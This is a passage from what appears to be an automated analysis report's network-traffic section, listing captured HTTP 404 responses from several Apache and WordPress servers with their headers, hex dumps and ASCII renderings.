2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:37 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:40 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 76 61 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:57:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:58:00 GMTServer: ApacheX-Powered-By: PHP/8.2.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 35 3e ff 42 c0 fb a2 d1 58 ce c2 eb 28 0d 2e e2 79 94 04 e3 64 be 5f ad cb cb cb e0 3a 59 af d6 a3 c8 51 a9 16 ce 56 51 ba 08 57 40 03 4d d0 69 2d 5c 2e 67 f1 38 5c c5 c9 a2 91 66 d9 97 57 f3 19 5e 11 02 4e 6b f6 50 bd 47 69 f8 cf 75 f2 d8 fb 26 8a 26 25 1c 86 06 25 eb 2c 1b 9f 27 c9 8c ba 6e 4c 51 b2 51 2b 